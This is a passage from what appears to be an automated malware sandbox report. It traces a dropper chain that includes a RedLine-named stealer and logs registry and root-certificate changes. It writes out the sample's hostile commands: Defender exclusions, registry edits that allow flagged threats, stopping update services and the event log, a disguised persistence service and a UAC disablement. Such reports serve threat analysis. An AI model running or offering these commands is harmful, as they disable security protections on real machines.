38cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	rMK6lP8pCPR2ZN98wR3VYof4.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	rMK6lP8pCPR2ZN98wR3VYof4.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	rMK6lP8pCPR2ZN98wR3VYof4.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	rMK6lP8pCPR2ZN98wR3VYof4.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2880	amers.exe
2180	axplons.exe
1128	cb34b3b35f.exe
2588	powershell.exe
2888	oNqPE9PHMgA7eaKzT63BcN1N.exe
2888	oNqPE9PHMgA7eaKzT63BcN1N.exe
2064	rMK6lP8pCPR2ZN98wR3VYof4.exe
2064	rMK6lP8pCPR2ZN98wR3VYof4.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	2356	693706.exe
Token: SeDebugPrivilege	2588	powershell.exe
Token: SeDebugPrivilege	2424	regsvcs.exe
Token: SeManageVolumePrivilege	2888	oNqPE9PHMgA7eaKzT63BcN1N.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
1664	0922dbdd3f5461945b2fdb4d0c6b21dadb42625fecc141c2eb889011046335d2_NeikiAnalytics.exe
2880	amers.exe
2356	693706.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1664 wrote to memory of 2612	1664	0922dbdd3f5461945b2fdb4d0c6b21dadb42625fecc141c2eb889011046335d2_NeikiAnalytics.exe	28
PID 1664 wrote to memory of 2612	1664	0922dbdd3f5461945b2fdb4d0c6b21dadb42625fecc141c2eb889011046335d2_NeikiAnalytics.exe	28
PID 1664 wrote to memory of 2612	1664	0922dbdd3f5461945b2fdb4d0c6b21dadb42625fecc141c2eb889011046335d2_NeikiAnalytics.exe	28
PID 1664 wrote to memory of 2612	1664	0922dbdd3f5461945b2fdb4d0c6b21dadb42625fecc141c2eb889011046335d2_NeikiAnalytics.exe	28
PID 2612 wrote to memory of 2452	2612	explorku.exe	29
PID 2612 wrote to memory of 2452	2612	explorku.exe	29
PID 2612 wrote to memory of 2452	2612	explorku.exe	29
PID 2612 wrote to memory of 2452	2612	explorku.exe	29
PID 2612 wrote to memory of 2880	2612	explorku.exe	31
PID 2612 wrote to memory of 2880	2612	explorku.exe	31
PID 2612 wrote to memory of 2880	2612	explorku.exe	31
PID 2612 wrote to memory of 2880	2612	explorku.exe	31
PID 2880 wrote to memory of 2180	2880	amers.exe	32
PID 2880 wrote to memory of 2180	2880	amers.exe	32
PID 2880 wrote to memory of 2180	2880	amers.exe	32
PID 2880 wrote to memory of 2180	2880	amers.exe	32
PID 2612 wrote to memory of 1948	2612	explorku.exe	33
PID 2612 wrote to memory of 1948	2612	explorku.exe	33
PID 2612 wrote to memory of 1948	2612	explorku.exe	33
PID 2612 wrote to memory of 1948	2612	explorku.exe	33
PID 2180 wrote to memory of 2764	2180	axplons.exe	34
PID 2180 wrote to memory of 2764	2180	axplons.exe	34
PID 2180 wrote to memory of 2764	2180	axplons.exe	34
PID 2180 wrote to memory of 2764	2180	axplons.exe	34
PID 2764 wrote to memory of 488	2764	alex.exe	36
PID 2764 wrote to memory of 488	2764	alex.exe	36
PID 2764 wrote to memory of 488	2764	alex.exe	36
PID 2764 wrote to memory of 488	2764	alex.exe	36
PID 2180 wrote to memory of 808	2180	axplons.exe	37
PID 2180 wrote to memory of 808	2180	axplons.exe	37
PID 2180 wrote to memory of 808	2180	axplons.exe	37
PID 2180 wrote to memory of 808	2180	axplons.exe	37
PID 2612 wrote to memory of 1128	2612	explorku.exe	75
PID 2612 wrote to memory of 1128	2612	explorku.exe	75
PID 2612 wrote to memory of 1128	2612	explorku.exe	75
PID 2612 wrote to memory of 1128	2612	explorku.exe	75
PID 2180 wrote to memory of 2260	2180	axplons.exe	40
PID 2180 wrote to memory of 2260	2180	axplons.exe	40
PID 2180 wrote to memory of 2260	2180	axplons.exe	40
PID 2180 wrote to memory of 2260	2180	axplons.exe	40
PID 2180 wrote to memory of 2260	2180	axplons.exe	40
PID 2180 wrote to memory of 2260	2180	axplons.exe	40
PID 2180 wrote to memory of 2260	2180	axplons.exe	40
PID 2260 wrote to memory of 2552	2260	install.exe	41
PID 2260 wrote to memory of 2552	2260	install.exe	41
PID 2260 wrote to memory of 2552	2260	install.exe	41
PID 2260 wrote to memory of 2552	2260	install.exe	41
PID 2260 wrote to memory of 2552	2260	install.exe	41
PID 2260 wrote to memory of 2552	2260	install.exe	41
PID 2260 wrote to memory of 2552	2260	install.exe	41
PID 2552 wrote to memory of 2636	2552	cmd.exe	43
PID 2552 wrote to memory of 2636	2552	cmd.exe	43
PID 2552 wrote to memory of 2636	2552	cmd.exe	43
PID 2552 wrote to memory of 2636	2552	cmd.exe	43
PID 2552 wrote to memory of 2192	2552	cmd.exe	82
PID 2552 wrote to memory of 2192	2552	cmd.exe	82
PID 2552 wrote to memory of 2192	2552	cmd.exe	82
PID 2552 wrote to memory of 2192	2552	cmd.exe	82
PID 2552 wrote to memory of 2628	2552	cmd.exe	45
PID 2552 wrote to memory of 2628	2552	cmd.exe	45
PID 2552 wrote to memory of 2628	2552	cmd.exe	45
PID 2552 wrote to memory of 2628	2552	cmd.exe	45
PID 2552 wrote to memory of 1980	2552	cmd.exe	46
PID 2552 wrote to memory of 1980	2552	cmd.exe	46

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

C:\Users\Admin\AppData\Local\Temp\0922dbdd3f5461945b2fdb4d0c6b21dadb42625fecc141c2eb889011046335d2_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\0922dbdd3f5461945b2fdb4d0c6b21dadb42625fecc141c2eb889011046335d2_NeikiAnalytics.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1664
- C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
  "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of WriteProcessMemory
  PID:2612
- - C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
    "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
    3⤵
    PID:2452
- - C:\Users\Admin\AppData\Local\Temp\1000013001\amers.exe
    "C:\Users\Admin\AppData\Local\Temp\1000013001\amers.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Loads dropped DLL
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:2880
  - - C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
      "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Loads dropped DLL
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2180
    - - C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2764
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 96
        6⤵
        Loads dropped DLL
        Program crash
        
        PID:488
    - - C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        
        PID:808
    - - C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of WriteProcessMemory
        
        PID:2260
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
        6⤵
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:2552
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClient
        7⤵
        Launches sc.exe
        
        PID:2636
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClient confirm
        7⤵
        Executes dropped EXE
        
        PID:2192
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLink
        7⤵
        Launches sc.exe
        
        PID:2628
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLink confirm
        7⤵
        Executes dropped EXE
        
        PID:1980
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
        7⤵
        Executes dropped EXE
        
        PID:2624
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLink
        7⤵
        Executes dropped EXE
        
        PID:2556
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
        6⤵
        
        PID:888
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClientC
        7⤵
        Launches sc.exe
        
        PID:2232
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClientC confirm
        7⤵
        Executes dropped EXE
        
        PID:2240
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete PiercingNetLink
        7⤵
        Launches sc.exe
        
        PID:2408
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove PiercingNetLink confirm
        7⤵
        Executes dropped EXE
        
        PID:2436
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
        7⤵
        Executes dropped EXE
        
        PID:2216
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start PiercingNetLink
        7⤵
        Executes dropped EXE
        
        PID:2228
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
        6⤵
        
        PID:472
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLinks
        7⤵
        Launches sc.exe
        
        PID:932
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLinks confirm
        7⤵
        Executes dropped EXE
        
        PID:1520
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
        7⤵
        Executes dropped EXE
        
        PID:1012
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLinks
        7⤵
        Executes dropped EXE
        
        PID:1128
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
        6⤵
        
        PID:2332
    - - C:\Users\Admin\AppData\Local\Temp\1000007001\swizzzz.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000007001\swizzzz.exe"
        5⤵
        Executes dropped EXE
        
        PID:2700
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2700 -s 96
        6⤵
        Loads dropped DLL
        Program crash
        
        PID:2772
    - - C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"
        5⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of SetThreadContext
        System policy modification
        
        PID:2060
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe" -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2588
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
        6⤵
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2424
        
        C:\Users\Admin\Pictures\oNqPE9PHMgA7eaKzT63BcN1N.exe
        
        "C:\Users\Admin\Pictures\oNqPE9PHMgA7eaKzT63BcN1N.exe" /s
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Writes to the Master Boot Record (MBR)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2888
        
        C:\Users\Admin\Pictures\360TS_Setup.exe
        
        "C:\Users\Admin\Pictures\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=
        8⤵
        
        PID:3188
        
        C:\Program Files (x86)\1716277521_0\360TS_Setup.exe
        
        "C:\Program Files (x86)\1716277521_0\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall
        9⤵
        
        PID:3832
        
        C:\Users\Admin\Pictures\TdKAq2r6YWficbH1Cbq6I4oo.exe
        
        "C:\Users\Admin\Pictures\TdKAq2r6YWficbH1Cbq6I4oo.exe"
        7⤵
        Executes dropped EXE
        
        PID:1832
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2752
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        8⤵
        
        PID:2288
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        9⤵
        
        PID:2436
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        8⤵
        Launches sc.exe
        
        PID:2420
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        8⤵
        Launches sc.exe
        
        PID:2992
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        8⤵
        Launches sc.exe
        
        PID:2212
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        8⤵
        Launches sc.exe
        
        PID:1812
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        8⤵
        Launches sc.exe
        
        PID:1720
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        8⤵
        
        PID:1612
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        8⤵
        
        PID:1560
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        8⤵
        
        PID:2296
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        8⤵
        
        PID:3020
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
        8⤵
        Launches sc.exe
        
        PID:1692
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
        8⤵
        Launches sc.exe
        
        PID:1364
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        8⤵
        Launches sc.exe
        
        PID:2220
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
        8⤵
        Launches sc.exe
        
        PID:1580
        
        C:\Users\Admin\Pictures\rMK6lP8pCPR2ZN98wR3VYof4.exe
        
        "C:\Users\Admin\Pictures\rMK6lP8pCPR2ZN98wR3VYof4.exe"
        7⤵
        Modifies firewall policy service
        Executes dropped EXE
        Drops file in System32 directory
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        
        PID:2064
        
        C:\Users\Admin\Pictures\dUyzkvVWSie4yYqhTWgCXSqI.exe
        
        "C:\Users\Admin\Pictures\dUyzkvVWSie4yYqhTWgCXSqI.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2256
        
        C:\Users\Admin\AppData\Local\Temp\7zSD76B.tmp\Install.exe
        
        .\Install.exe /IjiHdidVaJ "385118" /S
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:600
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        9⤵
        
        PID:1364
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        10⤵
        
        PID:1020
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        11⤵
        
        PID:1720
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        12⤵
        
        PID:1304
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        10⤵
        
        PID:2556
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        11⤵
        
        PID:888
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        12⤵
        
        PID:1380
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        10⤵
        
        PID:1248
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        11⤵
        
        PID:852
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        12⤵
        
        PID:1560
        
        C:\Windows\SysWOW64\forfiles.exe
        
